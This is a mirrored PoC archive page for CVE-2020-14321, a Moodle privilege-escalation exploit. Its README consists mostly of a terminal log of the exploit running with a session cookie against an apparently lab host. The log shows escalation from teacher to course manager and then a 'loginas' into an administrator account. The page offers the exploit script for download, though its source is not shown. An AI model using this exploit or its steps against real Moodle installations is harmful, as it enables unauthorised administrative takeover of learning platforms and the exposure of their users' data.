Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2020-14321 PoC — Moodle 权限许可和访问控制问题漏洞

Source
https://github.com/f0ns1/CVE-2020-14321-modified-exploit
Associated Vulnerability
Title:Moodle 权限许可和访问控制问题漏洞 (CVE-2020-14321)
Description:Moodle是一套免费、开源的电子学习软件平台,也称课程管理系统、学习管理系统或虚拟学习环境。 Moodle中存在权限许可和访问控制问题漏洞,该漏洞源于程序在课程注册中没有进行正确的安全限制。远程攻击者可利用该漏洞提升权限。以下产品及版本受到影响:Moodle 3.5.0版本至3.5.12版本,3.7.0版本至3.7.6版本,3.8.0版本至3.8.3版本,3.9.0版本。
Description
Modified Moodle exploit for privilege escalation (Dorvack)
Readme
# CVE-2020-14321-modified-exploit
original: `https://github.com/HoangKien1020/CVE-2020-14321`
Modified Moodle exploit for privilege escalation (Dorvack)
![login with cookie](login_with_cookie.png)

```
┌──(kali㉿kali)-[~/…/192.168.1.121/exploits/CVE-2020-14321/modified]
└─$ proxychains python cve202014321.py -url https://formacion.dorvack.corp -cookie jgs48ml47fra5v3r45vdhkokb9
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.14
[+] Your target: https://formacion.dorvack.corp
jgs48ml47fra5v3r45vdhkokb9
[+] Logging in to teacher
[proxychains] Strict chain  ...  127.0.0.1:8888  ...  formacion.dorvack.corp:443  ...  OK
[+] Teacher logins successfully!
('profile_url ', 'https://formacion.dorvack.corp/user/profile.php')
('user_id ', u'0')
force_id == 7
('user_id ', 7)
('course_id ', u'2')
('sessKey ', u'N1RVMFIKlu')
[+] Privilege Escalation To Manager in the course Done!
{"success":true,"response":{},"error":"","count":1}
{"success":true,"response":{},"error":"","count":1}
{"success":true,"response":{},"error":"","count":1}
{"success":true,"response":{},"error":"","count":1}
{"success":true,"response":{},"error":"","count":1}
{"success":true,"response":{},"error":"","count":1}
{"success":true,"response":{},"error":"","count":1}
{"success":true,"response":{},"error":"","count":1}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
{"error":"Invalid user","errorcode":"invaliduser","stacktrace":null,"debuginfo":null,"reproductionlink":null}
('course ', u'https://formacion.dorvack.corp/user/index.php?id=2')
[proxychains] Strict chain  ...  127.0.0.1:8888  ...  formacion.dorvack.corp:443  ...  OK
('context_id: ', u'0')
('get_user ', 'https://formacion.dorvack.corp/user/index.php?contextid=32&roleid=1')
('Manager_id ', [u'7', u'8'])
manager_id == 7 Admin 
manager_id == 8 Juanjo ---> of course hack to Juanjo 
('url_loginas ', u'https://formacion.dorvack.corp/course/loginas.php?id=2&user=8&sesskey=N1RVMFIKlu')
('new_session ', u'fioOrTuumN')
('go_to----> ', 'https://formacion.dorvack.corp/admin/search.php')


```

After refresh your browser:
![admin session](new_admin_session.png)
File Snapshot

 [4.0K]  /data/pocs/628fbf8d68c20b535498adfcb16c5a3edef8bc2e
├── [ 28K]  cve202014321.py
├── [128K]  login_with_cookie.png
├── [119K]  new_admin_session.png
└── [ 12K]  README.md

0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.